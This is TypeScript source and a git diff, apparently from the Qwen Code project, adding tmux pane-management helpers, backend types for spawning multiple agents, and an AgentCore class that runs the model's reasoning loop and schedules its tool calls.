 * Runs `tmux list-windows` with the format `#{window_name} #{window_id}` and
 * parses one window per output line. The window ID is taken to be the last
 * whitespace-separated token of the line and everything before it is the
 * name, so window names that contain spaces are returned intact (splitting
 * on the first whitespace would truncate "my window" to "my" and report
 * "window" as the ID).
 *
 * @param sessionName - Session whose windows are listed.
 * @param serverName - Optional tmux server name, forwarded to the tmux helper.
 * @returns One entry per parsable line; blank lines and lines without both a
 *   name and an ID are skipped.
 * @throws Error when the underlying tmux command fails.
 */
export async function tmuxListWindows(
  sessionName: string,
  serverName?: string,
): Promise<TmuxWindowInfo[]> {
  const output = await tmux(
    ['list-windows', '-t', sessionName, '-F', '#{window_name} #{window_id}'],
    serverName,
  );

  const windows: TmuxWindowInfo[] = [];
  for (const rawLine of output.split('\n')) {
    const line = rawLine.trim();
    if (!line) continue;

    // Greedy name, then the final token as the ID.
    const parsed = /^(.*\S)\s+(\S+)$/.exec(line);
    if (!parsed) continue; // only one token: name or ID is missing

    windows.push({ name: parsed[1]!, id: parsed[2]! });
  }
  return windows;
}
/**
 * Create a new detached tmux session (`new-session -d -s <name>`).
 *
 * @param name - Session name.
 * @param opts.windowName - Passed as `-n` when set.
 * @param opts.cols - Passed as `-x` when set to a non-zero value.
 * @param opts.rows - Passed as `-y` when set to a non-zero value.
 * @param serverName - Optional tmux server name, forwarded to the tmux helper.
 * @throws Error when the tmux command fails.
 */
export async function tmuxNewSession(
  name: string,
  opts?: { cols?: number; rows?: number; windowName?: string },
  serverName?: string,
): Promise<void> {
  const { windowName, cols, rows } = opts ?? {};
  const args = [
    'new-session',
    '-d',
    '-s',
    name,
    ...(windowName ? ['-n', windowName] : []),
    ...(cols ? ['-x', String(cols)] : []),
    ...(rows ? ['-y', String(rows)] : []),
  ];
  await tmux(args, serverName);
}
/**
 * Split a window/pane and return the ID of the pane that was created.
 *
 * The command is always run with `-P -F '#{pane_id}'` so tmux prints the new
 * pane's ID, which is returned trimmed.
 *
 * NOTE(review): `opts.percent` is sent as `-l <n>%`; whether every tmux
 * release allowed by the file's minimum-version check accepts a percentage
 * for `-l` should be confirmed against the tmux changelog.
 *
 * @param target - Target pane/window (e.g., session:window or pane ID).
 * @param opts.horizontal - Adds `-h` when true.
 * @param opts.percent - Size of the new pane as a percentage (e.g., 70).
 * @param opts.command - Shell command appended as the last argument, so it
 *   is what the new pane runs.
 * @param serverName - Optional tmux server name, forwarded to the tmux helper.
 * @returns The new pane's ID (e.g., '%5').
 * @throws Error when the tmux command fails.
 */
export async function tmuxSplitWindow(
  target: string,
  opts?: { horizontal?: boolean; percent?: number; command?: string },
  serverName?: string,
): Promise<string> {
  const { horizontal, percent, command } = opts ?? {};
  const args = [
    'split-window',
    '-t',
    target,
    ...(horizontal ? ['-h'] : []),
    ...(percent !== undefined ? ['-l', `${percent}%`] : []),
    // -P -F: print new pane info in the specified format
    '-P',
    '-F',
    '#{pane_id}',
    ...(command ? [command] : []),
  ];
  const newPaneId = await tmux(args, serverName);
  return newPaneId.trim();
}
/**
 * Parse the output of
 * `tmux list-panes -F '#{pane_id} #{pane_dead} #{pane_dead_status}'`.
 *
 * Each non-blank line is split on whitespace into pane ID, dead flag and
 * exit status. Lines with fewer than two fields are skipped. A pane counts
 * as dead only when the flag is exactly "1". The exit status defaults to 0
 * when the third field is missing or is not a number, so callers never
 * receive NaN as an exit code.
 *
 * @param output - Raw stdout of the list-panes command.
 * @returns One entry per parsable line, in output order.
 */
export function parseTmuxListPanes(output: string): TmuxPaneInfo[] {
  const panes: TmuxPaneInfo[] = [];
  for (const rawLine of output.split('\n')) {
    const line = rawLine.trim();
    if (!line) continue;

    const [paneId, deadFlag, statusField] = line.split(/\s+/);
    if (paneId === undefined || deadFlag === undefined) continue;

    const parsedStatus =
      statusField === undefined ? 0 : Number.parseInt(statusField, 10);

    panes.push({
      paneId,
      dead: deadFlag === '1',
      // Guard against a non-numeric status field.
      deadStatus: Number.isNaN(parsedStatus) ? 0 : parsedStatus,
    });
  }
  return panes;
}
+ * + * Kills the current process in the pane and starts a new one. + * The command becomes the pane's direct process, so `#{pane_dead}` + * is set when the command exits. + * + * @param paneId - Target pane ID + * @param command - Shell command to execute + */ +export async function tmuxRespawnPane( + paneId: string, + command: string, + serverName?: string, +): Promise { + await tmux(['respawn-pane', '-k', '-t', paneId, command], serverName); +} + +/** + * Break a pane into a target session (detaches from current window). + */ +export async function tmuxBreakPane( + paneId: string, + targetSession: string, + serverName?: string, +): Promise { + await tmux(['break-pane', '-s', paneId, '-t', targetSession], serverName); +} + +/** + * Join a pane into a target window. + */ +export async function tmuxJoinPane( + paneId: string, + target: string, + serverName?: string, +): Promise { + await tmux(['join-pane', '-s', paneId, '-t', target], serverName); +} + +/** + * Kill a tmux pane. + */ +export async function tmuxKillPane( + paneId: string, + serverName?: string, +): Promise { + await tmux(['kill-pane', '-t', paneId], serverName); +} + +/** + * Resize a tmux pane. + * + * @param paneId - Target pane ID + * @param opts.height - Height (number for lines, or string like '50%') + * @param opts.width - Width (number for columns, or string like '50%') + */ +export async function tmuxResizePane( + paneId: string, + opts: { height?: number | string; width?: number | string }, + serverName?: string, +): Promise { + const args = ['resize-pane', '-t', paneId]; + if (opts.height !== undefined) { + args.push('-y', String(opts.height)); + } + if (opts.width !== undefined) { + args.push('-x', String(opts.width)); + } + await tmux(args, serverName); +} + +/** + * Kill a tmux session. + */ +export async function tmuxKillSession( + name: string, + serverName?: string, +): Promise { + await tmux(['kill-session', '-t', name], serverName); +} + +/** + * Kill a tmux window. 
+ */ +export async function tmuxKillWindow( + target: string, + serverName?: string, +): Promise { + await tmux(['kill-window', '-t', target], serverName); +} + +/** + * Get the first pane ID of a target window. + * + * @param target - Target passed to `list-panes -t` + * @returns The first line of the list-panes output, trimmed + * @throws Error if the output contains no pane line + */ +export async function tmuxGetFirstPaneId( + target: string, + serverName?: string, +): Promise { + const output = await tmux( + ['list-panes', '-t', target, '-F', '#{pane_id}'], + serverName, + ); + const firstLine = output.trim().split('\n')[0]; + if (!firstLine) { + throw new Error(`No panes found in target: ${target}`); + } + return firstLine.trim(); +} diff --git a/packages/core/src/agents/backends/types.ts b/packages/core/src/agents/backends/types.ts new file mode 100644 index 000000000..98678fd0f --- /dev/null +++ b/packages/core/src/agents/backends/types.ts @@ -0,0 +1,276 @@ +/** + * @license + * Copyright 2025 Qwen Team + * SPDX-License-Identifier: Apache-2.0 + */ + +/** + * @fileoverview Shared types for multi-agent systems (Arena, Team, Swarm) + * and the Backend abstraction layer. + * + * These types are used across different agent orchestration modes. + */ + +import type { Content } from '@google/genai'; +import type { AnsiOutput } from '../../utils/terminalSerializer.js'; +import type { + PromptConfig, + ModelConfig, + RunConfig, + ToolConfig, +} from '../runtime/agent-types.js'; + +/** + * Canonical display mode values shared across core and CLI. + * Declared `as const` so the DisplayMode union can be derived from the values. + */ +export const DISPLAY_MODE = { + IN_PROCESS: 'in-process', + TMUX: 'tmux', + ITERM2: 'iterm2', +} as const; + +/** + * Supported display mode values: the union of the DISPLAY_MODE values + * ('in-process' | 'tmux' | 'iterm2'). + */ +export type DisplayMode = (typeof DISPLAY_MODE)[keyof typeof DISPLAY_MODE]; + +/** + * Configuration for spawning an agent subprocess.
+ */ +export interface AgentSpawnConfig { + /** Unique identifier for this agent */ + agentId: string; + /** Command to execute (e.g., the CLI binary path) */ + command: string; + /** Arguments to pass to the command */ + args: string[]; + /** Working directory for the subprocess */ + cwd: string; + /** Additional environment variables (merged with process.env) */ + env?: Record; + /** Terminal columns (default: 120) */ + cols?: number; + /** Terminal rows (default: 40) */ + rows?: number; + /** + * Backend-specific options (optional). + * These are ignored by backends that do not support them. + */ + backend?: { + tmux?: TmuxBackendOptions; + }; + + /** + * In-process spawn configuration (optional). + * When provided, InProcessBackend uses this to create an AgentInteractive + * instead of launching a PTY subprocess. + */ + inProcess?: InProcessSpawnConfig; +} + +/** + * Configuration for spawning an in-process agent (no PTY subprocess). + */ +export interface InProcessSpawnConfig { + /** Human-readable agent name for display. */ + agentName: string; + /** Optional initial task to start working on immediately. */ + initialTask?: string; + /** Runtime configuration for the AgentCore. */ + runtimeConfig: { + promptConfig: PromptConfig; + modelConfig: ModelConfig; + runConfig: RunConfig; + toolConfig?: ToolConfig; + }; + /** + * Per-agent auth/provider overrides. When present, a dedicated + * ContentGenerator is created for this agent instead of inheriting + * the parent process's. This enables Arena agents to target different + * model providers (OpenAI, Anthropic, Gemini, etc.) in the same session. + */ + authOverrides?: { + authType: string; + apiKey?: string; + baseUrl?: string; + }; + /** + * Optional chat history from the parent session. When provided, this + * history is prepended to the agent's chat so it has conversational + * context from the session that spawned it. + */ + chatHistory?: Content[]; +} + +/** + * Callback for agent exit events. 
+ */ +export type AgentExitCallback = ( + agentId: string, + exitCode: number | null, + signal: number | null, +) => void; + +/** + * Backend abstracts the display/pane management layer for multi-agent systems. + * + * Each display mode (in-process / tmux / iTerm2) implements this interface. The orchestration + * layer (Arena, Team, etc.) delegates all pane operations through the backend, + * making the display mode transparent. + */ +export interface Backend { + /** Backend type identifier. */ + readonly type: DisplayMode; + + /** + * Initialize the backend. + * - in-process: runs in the current process (not yet implemented) + * - tmux: verifies tmux availability, creates session + * - iTerm2: verifies iTerm2 is running + */ + init(): Promise; + + // ─── Agent Lifecycle ──────────────────────────────────────── + + /** + * Spawn a new agent subprocess. + * + * @param config - Agent spawn configuration (command, args, cwd, env, etc.) + * @returns Promise that resolves when the agent's pane/PTY is created and ready. + */ + spawnAgent(config: AgentSpawnConfig): Promise; + + /** + * Stop a specific agent. + */ + stopAgent(agentId: string): void; + + /** + * Stop all running agents. + */ + stopAll(): void; + + /** + * Clean up all resources (kill processes, destroy panes/sessions). + */ + cleanup(): Promise; + + /** + * Register a callback for agent exit events. + */ + setOnAgentExit(callback: AgentExitCallback): void; + + /** + * Wait for all agents to exit, with an optional timeout. + * + * @returns true if all agents exited, false if timeout was reached. + */ + waitForAll(timeoutMs?: number): Promise; + + // ─── Active Agent & Navigation ────────────────────────────── + + /** + * Switch the active agent for screen capture and input routing. + */ + switchTo(agentId: string): void; + + /** + * Switch to the next agent in order. + */ + switchToNext(): void; + + /** + * Switch to the previous agent in order. 
+ */ + switchToPrevious(): void; + + /** + * Get the ID of the currently active agent. + */ + getActiveAgentId(): string | null; + + // ─── Screen Capture ───────────────────────────────────────── + + /** + * Get the screen snapshot for the currently active agent. + * + * @returns AnsiOutput or null if no active agent or not supported. + */ + getActiveSnapshot(): AnsiOutput | null; + + /** + * Get the screen snapshot for a specific agent. + * + * @param agentId - Agent to capture + * @param scrollOffset - Lines to scroll back from viewport (default: 0) + * @returns AnsiOutput or null if not found or not supported. + */ + getAgentSnapshot(agentId: string, scrollOffset?: number): AnsiOutput | null; + + /** + * Get the maximum scrollback length for an agent's terminal buffer. + * + * @returns Number of scrollable lines, or 0 if not supported. + */ + getAgentScrollbackLength(agentId: string): number; + + // ─── Input ────────────────────────────────────────────────── + + /** + * Forward input to the currently active agent's PTY stdin. + * + * @returns true if input was forwarded, false otherwise. + */ + forwardInput(data: string): boolean; + + /** + * Write input to a specific agent's PTY stdin. + * + * @returns true if input was written, false otherwise. + */ + writeToAgent(agentId: string, data: string): boolean; + + // ─── Resize ───────────────────────────────────────────────── + + /** + * Resize all agent terminals/panes. + */ + resizeAll(cols: number, rows: number): void; + + // ─── External Session Info ───────────────────────────────── + + /** + * Get a user-facing hint for how to attach to the external display session. + * + * When the backend runs in external mode (e.g., a detached tmux server), + * this returns a shell command the user can run to view the agent panes. + * Returns null if not applicable (e.g., running inside tmux or iTerm2). + */ + getAttachHint(): string | null; +} + +/** + * Optional tmux backend configuration. 
+ */ +export interface TmuxBackendOptions { + /** tmux server name for -L (when running outside tmux) */ + serverName?: string; + /** tmux session name to use/create (when running outside tmux) */ + sessionName?: string; + /** tmux window name to use/create (when running outside tmux) */ + windowName?: string; + /** Pane title for this agent */ + paneTitle?: string; + /** Border style for inactive panes (tmux style string, e.g. "fg=blue") */ + paneBorderStyle?: string; + /** Border style for active pane (tmux style string, e.g. "fg=green,bold") */ + paneActiveBorderStyle?: string; + /** Pane border format (default: "#{pane_title}") */ + paneBorderFormat?: string; + /** Pane border status location: 'top', 'bottom', or 'off' */ + paneBorderStatus?: 'top' | 'bottom' | 'off'; + /** + * Leader pane width percentage (default: 30). + * NOTE(review): the defaults documented on this interface are not applied + * here; presumably the tmux backend supplies them — confirm. + */ + leaderPaneWidthPercent?: number; + /** First split percent when inside tmux (default: 70) */ + firstSplitPercent?: number; +} diff --git a/packages/core/src/agents/index.ts b/packages/core/src/agents/index.ts new file mode 100644 index 000000000..d29d4dc09 --- /dev/null +++ b/packages/core/src/agents/index.ts @@ -0,0 +1,18 @@ +/** + * @license + * Copyright 2025 Qwen Team + * SPDX-License-Identifier: Apache-2.0 + */ + +/** + * @fileoverview Multi-agent infrastructure shared across Arena, Team, and Swarm modes.
+ * + * This module provides the common building blocks for managing multiple concurrent + * agents: + * - Backend: Display abstraction (in-process, tmux, iTerm2) + * - Shared types for agent spawning and lifecycle + * + * It re-exports the backends, arena, and runtime sub-modules. + */ + +export * from './backends/index.js'; +export * from './arena/index.js'; +export * from './runtime/index.js'; diff --git a/packages/core/src/agents/runtime/agent-core.ts b/packages/core/src/agents/runtime/agent-core.ts new file mode 100644 index 000000000..fb63cb530 --- /dev/null +++ b/packages/core/src/agents/runtime/agent-core.ts @@ -0,0 +1,1049 @@ +/** + * @license + * Copyright 2025 Qwen + * SPDX-License-Identifier: Apache-2.0 + */ + +/** + * @fileoverview AgentCore — the shared execution engine for subagents. + * + * AgentCore encapsulates the model reasoning loop, tool scheduling, stats, + * and event emission. It is composed by both AgentHeadless (one-shot tasks) + * and AgentInteractive (persistent interactive agents). + * + * AgentCore is stateless per-call: it does not own lifecycle or termination + * logic. The caller (executor/collaborator) controls when to start, stop, + * and how to interpret the results.
+ */ + +import { reportError } from '../../utils/errorReporting.js'; +import type { Config } from '../../config/config.js'; +import { type ToolCallRequestInfo } from '../../core/turn.js'; +import { + CoreToolScheduler, + type ToolCall, + type ExecutingToolCall, + type WaitingToolCall, +} from '../../core/coreToolScheduler.js'; +import type { + ToolConfirmationOutcome, + ToolCallConfirmationDetails, +} from '../../tools/tools.js'; +import { getInitialChatHistory } from '../../utils/environmentContext.js'; +import type { + Content, + Part, + FunctionCall, + GenerateContentConfig, + FunctionDeclaration, + GenerateContentResponseUsageMetadata, +} from '@google/genai'; +import { GeminiChat } from '../../core/geminiChat.js'; +import type { + PromptConfig, + ModelConfig, + RunConfig, + ToolConfig, +} from './agent-types.js'; +import { AgentTerminateMode } from './agent-types.js'; +import type { + AgentRoundEvent, + AgentRoundTextEvent, + AgentToolCallEvent, + AgentToolResultEvent, + AgentToolOutputUpdateEvent, + AgentUsageEvent, + AgentHooks, +} from './agent-events.js'; +import { type AgentEventEmitter, AgentEventType } from './agent-events.js'; +import { AgentStatistics, type AgentStatsSummary } from './agent-statistics.js'; +import { TaskTool } from '../../tools/task.js'; +import { DEFAULT_QWEN_MODEL } from '../../config/models.js'; +import { type ContextState, templateString } from './agent-headless.js'; + +/** + * Result of a single reasoning loop invocation. + */ +export interface ReasoningLoopResult { + /** The final model text response (empty if terminated by abort/limits). */ + text: string; + /** Why the loop ended. null = normal text completion (no tool calls). */ + terminateMode: AgentTerminateMode | null; + /** Number of model round-trips started (the loop's turn counter at exit). */ + turnsUsed: number; +} + +/** + * Options for configuring a reasoning loop invocation. + * A limit that is omitted or 0 is not enforced. + */ +export interface ReasoningLoopOptions { + /** Maximum number of turns before stopping. 
*/ + maxTurns?: number; + /** Maximum wall-clock time in minutes before stopping. */ + maxTimeMinutes?: number; + /** Start time in ms (for timeout calculation). Defaults to Date.now(). */ + startTimeMs?: number; +} + +/** + * Options for chat creation. + */ +export interface CreateChatOptions { + /** + * When true, omits the "non-interactive mode" system prompt suffix. + * Used by AgentInteractive for persistent interactive agents. + */ + interactive?: boolean; + /** + * Optional conversation history from a parent session. When provided, + * createChat places it after the environment history and before the + * prompt's initialMessages, so the agent has prior conversational + * context (e.g., from the main session that spawned it). + */ + extraHistory?: Content[]; +} + +/** + * Legacy execution stats maintained for backward compatibility. + * + * NOTE(review): only `rounds` is written in the visible part of this file + * (by runReasoningLoop); the remaining counters are presumably updated by + * recordToolCallStats / recordTokenUsage — confirm. + */ +export interface ExecutionStats { + startTimeMs: number; + totalDurationMs: number; + /** Set to the reasoning loop's turn counter after each round. */ + rounds: number; + totalToolCalls: number; + successfulToolCalls: number; + failedToolCalls: number; + inputTokens?: number; + outputTokens?: number; + totalTokens?: number; +} + +/** + * AgentCore — shared execution engine for model reasoning and tool scheduling. + * + * This class encapsulates: + * - Chat/model session creation (`createChat`) + * - Tool list preparation (`prepareTools`) + * - The inner reasoning loop (`runReasoningLoop`) + * - Tool call scheduling and execution (`processFunctionCalls`) + * - Statistics tracking and event emission + * + * It does NOT manage lifecycle (start/stop/terminate), abort signals, + * or final result interpretation — those are the caller's responsibility.
+ */ +export class AgentCore { + /** Identifier built in the constructor as `<name>-<random base-36 suffix>`. */ + readonly subagentId: string; + readonly name: string; + readonly runtimeContext: Config; + readonly promptConfig: PromptConfig; + readonly modelConfig: ModelConfig; + readonly runConfig: RunConfig; + readonly toolConfig?: ToolConfig; + readonly eventEmitter?: AgentEventEmitter; + readonly hooks?: AgentHooks; + readonly stats = new AgentStatistics(); + + /** + * Legacy execution stats maintained for aggregate tracking. + */ + executionStats: ExecutionStats = { + startTimeMs: 0, + totalDurationMs: 0, + rounds: 0, + totalToolCalls: 0, + successfulToolCalls: 0, + failedToolCalls: 0, + inputTokens: 0, + outputTokens: 0, + totalTokens: 0, + }; + /** + * The prompt token count from the most recent model response. + * Exposed so UI hooks can seed initial state without waiting for events. + */ + lastPromptTokenCount = 0; + + /** + * Per-tool usage counters. + * NOTE(review): presumably keyed by tool name and maintained by + * recordToolCallStats, which is outside this chunk — confirm. + */ + private toolUsage = new Map< + string, + { + count: number; + success: number; + failure: number; + lastError?: string; + totalDurationMs?: number; + averageDurationMs?: number; + } + >(); + + /** + * Stores the supplied configuration and derives `subagentId` from `name` + * plus a short Math.random() suffix (for readability, not a security token). 
+ */ + constructor( + name: string, + runtimeContext: Config, + promptConfig: PromptConfig, + modelConfig: ModelConfig, + runConfig: RunConfig, + toolConfig?: ToolConfig, + eventEmitter?: AgentEventEmitter, + hooks?: AgentHooks, + ) { + const randomPart = Math.random().toString(36).slice(2, 8); + this.subagentId = `${name}-${randomPart}`; + this.name = name; + this.runtimeContext = runtimeContext; + this.promptConfig = promptConfig; + this.modelConfig = modelConfig; + this.runConfig = runConfig; + this.toolConfig = toolConfig; + this.eventEmitter = eventEmitter; + this.hooks = hooks; + } + + // ─── Chat Creation ──────────────────────────────────────── + + /** + * Creates a GeminiChat instance configured for this agent. + * + * @param context - Context state for template variable substitution. + * @param options - Chat creation options. + * - `interactive`: When true, omits the "non-interactive mode" system prompt suffix.
+ * @returns A configured GeminiChat, or undefined if initialization fails. + */ + async createChat( + context: ContextState, + options?: CreateChatOptions, + ): Promise { + if (!this.promptConfig.systemPrompt && !this.promptConfig.initialMessages) { + throw new Error( + 'PromptConfig must have either `systemPrompt` or `initialMessages` defined.', + ); + } + if (this.promptConfig.systemPrompt && this.promptConfig.initialMessages) { + throw new Error( + 'PromptConfig cannot have both `systemPrompt` and `initialMessages` defined.', + ); + } + + const envHistory = await getInitialChatHistory(this.runtimeContext); + + const startHistory = [ + ...envHistory, + ...(options?.extraHistory ?? []), + ...(this.promptConfig.initialMessages ?? []), + ]; + + const systemInstruction = this.promptConfig.systemPrompt + ? this.buildChatSystemPrompt(context, options) + : undefined; + + try { + const generationConfig: GenerateContentConfig & { + systemInstruction?: string | Content; + } = { + temperature: this.modelConfig.temp, + topP: this.modelConfig.top_p, + }; + + if (systemInstruction) { + generationConfig.systemInstruction = systemInstruction; + } + + return new GeminiChat( + this.runtimeContext, + generationConfig, + startHistory, + ); + } catch (error) { + await reportError( + error, + 'Error initializing chat session.', + startHistory, + 'startChat', + ); + return undefined; + } + } + + // ─── Tool Preparation ───────────────────────────────────── + + /** + * Prepares the list of tools available to this agent. + * + * If no explicit toolConfig or it contains "*" or is empty, + * inherits all tools (excluding TaskTool to prevent recursion). 
+ */ + prepareTools(): FunctionDeclaration[] { + const toolRegistry = this.runtimeContext.getToolRegistry(); + const toolsList: FunctionDeclaration[] = []; + + if (this.toolConfig) { + const asStrings = this.toolConfig.tools.filter( + (t): t is string => typeof t === 'string', + ); + const hasWildcard = asStrings.includes('*'); + const onlyInlineDecls = this.toolConfig.tools.filter( + (t): t is FunctionDeclaration => typeof t !== 'string', + ); + + if (hasWildcard || asStrings.length === 0) { + toolsList.push( + ...toolRegistry + .getFunctionDeclarations() + .filter((t) => t.name !== TaskTool.Name), + ); + } else { + toolsList.push( + ...toolRegistry.getFunctionDeclarationsFiltered(asStrings), + ); + } + toolsList.push(...onlyInlineDecls); + } else { + // Inherit all available tools by default when not specified. + toolsList.push( + ...toolRegistry + .getFunctionDeclarations() + .filter((t) => t.name !== TaskTool.Name), + ); + } + + return toolsList; + } + + // ─── Reasoning Loop ─────────────────────────────────────── + + /** + * Runs the inner model reasoning loop. + * + * This is the core execution cycle: + * send messages → stream response → collect tool calls → execute tools → repeat. + * + * The loop terminates when: + * - The model produces a text response without tool calls (normal completion) + * - maxTurns is reached + * - maxTimeMinutes is exceeded + * - The abortController signal fires + * + * @param chat - The GeminiChat session to use. + * @param initialMessages - The first messages to send (e.g., user task prompt). + * @param toolsList - Available tool declarations. + * @param abortController - Controls cancellation of the current loop. + * @param options - Optional limits (maxTurns, maxTimeMinutes). + * @returns ReasoningLoopResult with the final text, terminate mode, and turns used. 
+ */ + async runReasoningLoop( + chat: GeminiChat, + initialMessages: Content[], + toolsList: FunctionDeclaration[], + abortController: AbortController, + options?: ReasoningLoopOptions, + ): Promise { + const startTime = options?.startTimeMs ?? Date.now(); + let currentMessages = initialMessages; + let turnCounter = 0; + let finalText = ''; + let terminateMode: AgentTerminateMode | null = null; + + while (true) { + // Check abort before starting a new round — prevents unnecessary API + // calls after processFunctionCalls was unblocked by an abort signal. + if (abortController.signal.aborted) { + terminateMode = AgentTerminateMode.CANCELLED; + break; + } + + // Check termination conditions. + if (options?.maxTurns && turnCounter >= options.maxTurns) { + terminateMode = AgentTerminateMode.MAX_TURNS; + break; + } + + let durationMin = (Date.now() - startTime) / (1000 * 60); + if (options?.maxTimeMinutes && durationMin >= options.maxTimeMinutes) { + terminateMode = AgentTerminateMode.TIMEOUT; + break; + } + + // Create a new AbortController per round to avoid listener accumulation + // in the model SDK. The parent abortController propagates abort to it. 
+ const roundAbortController = new AbortController(); + const onParentAbort = () => roundAbortController.abort(); + abortController.signal.addEventListener('abort', onParentAbort); + if (abortController.signal.aborted) { + roundAbortController.abort(); + } + + const promptId = `${this.runtimeContext.getSessionId()}#${this.subagentId}#${turnCounter++}`; + + const messageParams = { + message: currentMessages[0]?.parts || [], + config: { + abortSignal: roundAbortController.signal, + tools: [{ functionDeclarations: toolsList }], + }, + }; + + const roundStreamStart = Date.now(); + const responseStream = await chat.sendMessageStream( + this.modelConfig.model || + this.runtimeContext.getModel() || + DEFAULT_QWEN_MODEL, + messageParams, + promptId, + ); + this.eventEmitter?.emit(AgentEventType.ROUND_START, { + subagentId: this.subagentId, + round: turnCounter, + promptId, + timestamp: Date.now(), + } as AgentRoundEvent); + + const functionCalls: FunctionCall[] = []; + let roundText = ''; + let roundThoughtText = ''; + let lastUsage: GenerateContentResponseUsageMetadata | undefined = + undefined; + let currentResponseId: string | undefined = undefined; + + for await (const streamEvent of responseStream) { + if (roundAbortController.signal.aborted) { + abortController.signal.removeEventListener('abort', onParentAbort); + return { + text: finalText, + terminateMode: AgentTerminateMode.CANCELLED, + turnsUsed: turnCounter, + }; + } + + // Handle retry events + if (streamEvent.type === 'retry') { + continue; + } + + // Handle chunk events + if (streamEvent.type === 'chunk') { + const resp = streamEvent.value; + // Track the response ID for tool call correlation + if (resp.responseId) { + currentResponseId = resp.responseId; + } + if (resp.functionCalls) functionCalls.push(...resp.functionCalls); + const content = resp.candidates?.[0]?.content; + const parts = content?.parts || []; + for (const p of parts) { + const txt = p.text; + const isThought = p.thought ?? 
false; + if (txt && isThought) roundThoughtText += txt; + if (txt && !isThought) roundText += txt; + if (txt) + this.eventEmitter?.emit(AgentEventType.STREAM_TEXT, { + subagentId: this.subagentId, + round: turnCounter, + text: txt, + thought: isThought, + timestamp: Date.now(), + }); + } + if (resp.usageMetadata) lastUsage = resp.usageMetadata; + } + } + + if (roundText || roundThoughtText) { + this.eventEmitter?.emit(AgentEventType.ROUND_TEXT, { + subagentId: this.subagentId, + round: turnCounter, + text: roundText, + thoughtText: roundThoughtText, + timestamp: Date.now(), + } as AgentRoundTextEvent); + } + + this.executionStats.rounds = turnCounter; + this.stats.setRounds(turnCounter); + + durationMin = (Date.now() - startTime) / (1000 * 60); + if (options?.maxTimeMinutes && durationMin >= options.maxTimeMinutes) { + abortController.signal.removeEventListener('abort', onParentAbort); + terminateMode = AgentTerminateMode.TIMEOUT; + break; + } + + // Update token usage if available + if (lastUsage) { + this.recordTokenUsage(lastUsage, turnCounter, roundStreamStart); + } + + if (functionCalls.length > 0) { + currentMessages = await this.processFunctionCalls( + functionCalls, + roundAbortController, + promptId, + turnCounter, + toolsList, + currentResponseId, + ); + } else { + // No tool calls — treat this as the model's final answer. + if (roundText && roundText.trim().length > 0) { + finalText = roundText.trim(); + // Emit ROUND_END for the final round so all consumers see it. + // Previously this was skipped, requiring AgentInteractive to + // compensate with an explicit flushStreamBuffers() call. 
+ this.eventEmitter?.emit(AgentEventType.ROUND_END, { + subagentId: this.subagentId, + round: turnCounter, + promptId, + timestamp: Date.now(), + } as AgentRoundEvent); + // Clean up before breaking + abortController.signal.removeEventListener('abort', onParentAbort); + // null terminateMode = normal text completion + break; + } + // Otherwise, nudge the model to finalize a result. + currentMessages = [ + { + role: 'user', + parts: [ + { + text: 'Please provide the final result now and stop calling tools.', + }, + ], + }, + ]; + } + + this.eventEmitter?.emit(AgentEventType.ROUND_END, { + subagentId: this.subagentId, + round: turnCounter, + promptId, + timestamp: Date.now(), + } as AgentRoundEvent); + + // Clean up the per-round listener before the next iteration + abortController.signal.removeEventListener('abort', onParentAbort); + } + + return { + text: finalText, + terminateMode, + turnsUsed: turnCounter, + }; + } + + // ─── Tool Execution ─────────────────────────────────────── + + /** + * Processes a list of function calls via CoreToolScheduler. + * + * Validates each call against the allowed tools list, schedules authorized + * calls, collects results, and emits events for each call/result. + * + * Validates each call, schedules authorized calls, collects results, and emits events. + */ + async processFunctionCalls( + functionCalls: FunctionCall[], + abortController: AbortController, + promptId: string, + currentRound: number, + toolsList: FunctionDeclaration[], + responseId?: string, + ): Promise { + const toolResponseParts: Part[] = []; + + // Build allowed tool names set for filtering + const allowedToolNames = new Set(toolsList.map((t) => t.name)); + + // Filter unauthorized tool calls before scheduling + const authorizedCalls: FunctionCall[] = []; + for (const fc of functionCalls) { + const callId = fc.id ?? 
`${fc.name}-${Date.now()}`; + + if (!allowedToolNames.has(fc.name)) { + const toolName = String(fc.name); + const errorMessage = `Tool "${toolName}" not found. Tools must use the exact names provided.`; + + // Emit TOOL_CALL event for visibility + this.eventEmitter?.emit(AgentEventType.TOOL_CALL, { + subagentId: this.subagentId, + round: currentRound, + callId, + name: toolName, + args: fc.args ?? {}, + description: `Tool "${toolName}" not found`, + isOutputMarkdown: false, + timestamp: Date.now(), + } as AgentToolCallEvent); + + // Build function response part (used for both event and LLM) + const functionResponsePart = { + functionResponse: { + id: callId, + name: toolName, + response: { error: errorMessage }, + }, + }; + + // Emit TOOL_RESULT event with error + this.eventEmitter?.emit(AgentEventType.TOOL_RESULT, { + subagentId: this.subagentId, + round: currentRound, + callId, + name: toolName, + success: false, + error: errorMessage, + responseParts: [functionResponsePart], + resultDisplay: errorMessage, + durationMs: 0, + timestamp: Date.now(), + } as AgentToolResultEvent); + + // Record blocked tool call in stats + this.recordToolCallStats(toolName, false, 0, errorMessage); + + // Add function response for LLM + toolResponseParts.push(functionResponsePart); + continue; + } + authorizedCalls.push(fc); + } + + // Build scheduler + const responded = new Set(); + let resolveBatch: (() => void) | null = null; + const emittedCallIds = new Set(); + // pidMap: callId → PTY PID, populated by onToolCallsUpdate when a shell + // tool spawns a PTY. Shared with outputUpdateHandler via closure so the + // PID is included in TOOL_OUTPUT_UPDATE events for interactive shell support. 
+ const pidMap = new Map(); + const scheduler = new CoreToolScheduler({ + config: this.runtimeContext, + outputUpdateHandler: (callId, outputChunk) => { + this.eventEmitter?.emit(AgentEventType.TOOL_OUTPUT_UPDATE, { + subagentId: this.subagentId, + round: currentRound, + callId, + outputChunk, + pid: pidMap.get(callId), + timestamp: Date.now(), + } as AgentToolOutputUpdateEvent); + }, + onAllToolCallsComplete: async (completedCalls) => { + for (const call of completedCalls) { + if (emittedCallIds.has(call.request.callId)) continue; + emittedCallIds.add(call.request.callId); + + const toolName = call.request.name; + const duration = call.durationMs ?? 0; + const success = call.status === 'success'; + const errorMessage = + call.status === 'error' || call.status === 'cancelled' + ? call.response.error?.message + : undefined; + + // Record stats + this.recordToolCallStats(toolName, success, duration, errorMessage); + + // Emit tool result event + this.eventEmitter?.emit(AgentEventType.TOOL_RESULT, { + subagentId: this.subagentId, + round: currentRound, + callId: call.request.callId, + name: toolName, + success, + error: errorMessage, + responseParts: call.response.responseParts, + resultDisplay: call.response.resultDisplay, + durationMs: duration, + timestamp: Date.now(), + } as AgentToolResultEvent); + + // post-tool hook + await this.hooks?.postToolUse?.({ + subagentId: this.subagentId, + name: this.name, + toolName, + args: call.request.args, + success, + durationMs: 